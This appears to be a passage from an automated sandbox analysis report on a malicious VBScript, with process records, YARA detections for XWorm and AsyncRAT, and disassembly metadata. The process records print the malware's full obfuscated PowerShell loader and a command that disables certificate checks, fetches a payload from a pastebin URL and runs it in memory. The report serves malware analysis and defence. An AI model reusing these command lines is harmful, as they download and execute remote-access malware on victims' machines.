                                                            Data Ascii: BwaAUHAiBAcA4GAOBQUAoFA5BQNAcEAwAgdAEFAvBgaAUFAGBQOA0GAKBAdAIDAhBQSAMHAOBwNAwGAwAQUAADAwAQWHDIAAgEAsBgMAUGAzBARAQGA6BQWAEFAvBATAoGAGBAeAEDAoBgcAMGAMBAeAYFAwBgVA4GA2BwcAkDAMBgZAcGAGBwUAoGA6BwNAoGAGBgaAQDAtBgdAcEAVBQTAwGAXBQaAcGAJBAMAkHAFBAWA4GAyBAOAwGArBgV
                                                            2024-10-03 04:53:35 UTC1355INData Raw: 47 41 71 42 77 51 41 4d 44 41 42 42 41 52 41 49 45 41 47 42 51 51 41 77 45 41 31 42 41 54 41 51 47 41 42 42 77 63 41 55 47 41 35 41 77 64 41 49 44 41 75 42 67 4d 41 63 48 41 79 41 41 57 48 44 49 41 41 63 44 41 59 42 51 52 41 45 46 41 31 42 41 61 41 49 48 41 30 41 67 51 41 63 48 41 30 41 51 61 41 63 48 41 47 42 77 56 41 45 44 41 51 42 67 61 41 51 48 41 4b 42 41 62 41 6f 46 41 71 42 51 59 41 4d 45 41 6d 42 67 64 41 45 44 41 46 42 41 55 41 63 44 41 77 42 77 52 41 55 44 41 72 42 67 57 41 51 46 41 74 42 67 51 41 49 48 41 52 42 51 5a 41 6f 47 41 71 42 67 64 41 59 45 41 61 42 67 53 41 49 48 41 75 42 51 4e 41 49 46 41 33 42 41 64 41 49 47 41 43 42 51 61 41 49 45 41 74 42 41 53 41 63 45 41 6c 42 51 52 41 63 44 41 79 42 67 4d 41 49 46 41 32 42 77 55 41 6f 45 41 72
                                                            Data Ascii: GAqBwQAMDABBARAIEAGBQQAwEA1BATAQGABBwcAUGA5AwdAIDAuBgMAcHAyAAWHDIAAcDAYBQRAEFA1BAaAIHA0AgQAcHA0AQaAcHAGBwVAEDAQBgaAQHAKBAbAoFAqBQYAMEAmBgdAEDAFBAUAcDAwBwRAUDArBgWAQFAtBgQAIHARBQZAoGAqBgdAYEAaBgSAIHAuBQNAIFA3BAdAIGACBQaAIEAtBASAcEAlBQRAcDAyBgMAIFA2BwUAoEAr


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:00:53:00
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                                                            Imagebase:0x7ff7cfbd0000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:00:53:01
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:00:53:01
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:4
                                                            Start time:00:53:03
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.2275849504.000002877CA20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL, Description: Detects executables (downloaders) containing reversed URLs to raw contents of a paste, Source: 00000004.00000002.2275849504.000002877CA20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: MALWARE_Win_DLAgent09, Description: Detects known downloader agent, Source: 00000004.00000002.2275849504.000002877CA20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:00:53:08
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:00:53:13
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0x100000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:00:53:13
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0xea0000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.3349422989.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:9
                                                            Start time:00:53:21
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:00:53:21
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:00:53:22
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                                                            Imagebase:0x7ff7cfbd0000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:00:53:25
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:00:53:25
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:00:53:25
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.2403141075.00000272D6986000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.2403141075.00000272D6986000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            Has exited:true

                                                            General

                                                            Target ID:15
                                                            Start time:00:53:29
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:16
                                                            Start time:00:53:34
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0x9e0000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000010.00000002.2381808798.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000010.00000002.2381808798.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Executed Functions

                                                              Function 00007FF848E737B5 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2312711692.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ff848e70000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction ID: 74e4a02f44bf7c5992a080c9be1fc7c96fd609f2ef856c70fdf68f16b12d8372
                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction Fuzzy Hash: E601677111CB0D4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3651D736E882CB45

                                                              Execution Graph

                                                              Execution Coverage:10.5%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:23
                                                              Total number of Limit Nodes:1
                                                              execution_graph 4726 7ff848e59d2d 4727 7ff848e59d3b WriteProcessMemory 4726->4727 4729 7ff848e59eb4 4727->4729 4730 7ff848e595a9 4731 7ff848e5961e CreateProcessW 4730->4731 4732 7ff848e595b8 4730->4732 4733 7ff848e596b0 4731->4733 4732->4731 4734 7ff848e59829 4735 7ff848e59837 Wow64SetThreadContext 4734->4735 4737 7ff848e59981 4735->4737 4738 7ff848e59f19 4739 7ff848e59f27 ResumeThread 4738->4739 4741 7ff848e59ffc 4739->4741 4742 7ff848e56238 4743 7ff848e5622b 4742->4743 4743->4742 4744 7ff848e56246 4743->4744 4745 7ff848e59e19 WriteProcessMemory 4743->4745 4746 7ff848e59eb4 4745->4746 4762 7ff848e561f8 4765 7ff848e56201 4762->4765 4763 7ff848e56246 4764 7ff848e59e19 WriteProcessMemory 4766 7ff848e59eb4 4764->4766 4765->4763 4765->4764

                                                              Executed Functions

                                                              Function 00007FF848F2144D Relevance: 4.7, Strings: 2, Instructions: 2237COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2278836005.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: N_H$!
                                                              • API String ID: 0-3136906785
                                                              • Opcode ID: bdde106e13fd6defd769663327b5928b8cac0c4907052deaec6c556592e91324
                                                              • Instruction ID: 16a2a30afd09c354ee13e27c03d133481a0d15c74840e4eb5d1e5ebdb8cdcc4e
                                                              • Opcode Fuzzy Hash: bdde106e13fd6defd769663327b5928b8cac0c4907052deaec6c556592e91324
                                                              • Instruction Fuzzy Hash: 56E26632E0EA894FE79AA76C68151B47BE1EF56250F0801FBD04DC71D3DE19AC46C39A
                                                              Function 00007FF848E56CD8 Relevance: 1.1, Instructions: 1065COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2277773210.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 860d3214ceb637d1a6ab49e196c59add7edc9ce9238ec53e0d23dc75a9928cc6
                                                              • Instruction ID: 23e900afec3da0103ffaf2b7951b549e095917e0d5dcad200e7975cf229084e8
                                                              • Opcode Fuzzy Hash: 860d3214ceb637d1a6ab49e196c59add7edc9ce9238ec53e0d23dc75a9928cc6
                                                              • Instruction Fuzzy Hash: E99216B0909A598FDB9AEF28C8547A9B7F1FF59340F5041EAD00DE7292CA385A80CF55
                                                              Function 00007FF848E5794D Relevance: .1, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2277773210.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f43db321b964bebf021f6a347d4fcdda7bf213474f8efd13b66ffa2f423c5120
                                                              • Instruction ID: bdfbee82c34061ec835ae41c4f932d9bd82796e1393cf5343bc30d114b5297f8
                                                              • Opcode Fuzzy Hash: f43db321b964bebf021f6a347d4fcdda7bf213474f8efd13b66ffa2f423c5120
                                                              • Instruction Fuzzy Hash: 193139B0D08A598FDB9ADF18C890BA9B7F1FF59340F1001EE910DE7291CB756A808F45
                                                              Function 00007FF848F20061 Relevance: 2.4, Strings: 1, Instructions: 1122COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 364 7ff848f20061-7ff848f200b8 372 7ff848f200ba-7ff848f200db 364->372 373 7ff848f200de-7ff848f2015e 364->373 379 7ff848f20160-7ff848f20179 373->379 380 7ff848f20184-7ff848f20219 373->380 379->380 387 7ff848f2021f-7ff848f20229 380->387 388 7ff848f20466-7ff848f204f7 380->388 389 7ff848f2022b-7ff848f20243 387->389 390 7ff848f20245-7ff848f20252 387->390 420 7ff848f204f9 388->420 421 7ff848f204fe-7ff848f2050f 388->421 389->390 396 7ff848f20258-7ff848f2025b 390->396 397 7ff848f20403-7ff848f2040d 390->397 396->397 399 7ff848f20261-7ff848f20269 396->399 400 7ff848f2040f-7ff848f2041d 397->400 401 7ff848f2041e-7ff848f20463 397->401 399->388 403 7ff848f2026f-7ff848f20279 399->403 401->388 405 7ff848f2027b-7ff848f20290 403->405 406 7ff848f20292-7ff848f20297 403->406 405->406 406->397 408 7ff848f2029d-7ff848f202a0 406->408 411 7ff848f202a2-7ff848f202b5 408->411 412 7ff848f202b7 408->412 415 7ff848f202b9-7ff848f202bb 411->415 412->415 415->397 419 7ff848f202c1-7ff848f202c9 415->419 422 7ff848f202d9 419->422 423 7ff848f202cb-7ff848f202d5 419->423 420->421 424 7ff848f204fb 420->424 425 7ff848f20511 421->425 426 7ff848f20516-7ff848f205ad 421->426 430 7ff848f202de-7ff848f202f3 422->430 427 7ff848f202f5-7ff848f202fb 423->427 428 7ff848f202d7 423->428 424->421 425->426 429 7ff848f20513 425->429 449 7ff848f20721-7ff848f20790 426->449 450 7ff848f205b3-7ff848f205bd 426->450 431 7ff848f202fd-7ff848f2030a 427->431 432 7ff848f20317-7ff848f20331 427->432 428->430 429->426 430->427 431->432 437 7ff848f2030c-7ff848f20315 431->437 432->422 438 7ff848f20333-7ff848f2033d 432->438 437->432 440 7ff848f2033f-7ff848f20354 438->440 441 7ff848f20356-7ff848f203b0 438->441 440->441 465 7ff848f203c9-7ff848f203d7 441->465 466 7ff848f203b2-7ff848f203c7 441->466 462 7ff848f20799-7ff848f207c7 449->462 463 7ff848f20792-7ff848f20797 449->463 451 7ff848f205bf-7ff848f205d4 450->451 452 7ff848f205d6-7ff848f205e7 450->452 451->452 453 7ff848f205e9-7ff848f205ff 452->453 454 7ff848f20601-7ff848f20639 452->454 453->454 481 7ff848f2063b-7ff848f20653 454->481 482 7ff848f20655-7ff848f2066a 454->482 471 7ff848f207cd-7ff848f207d7 462->471 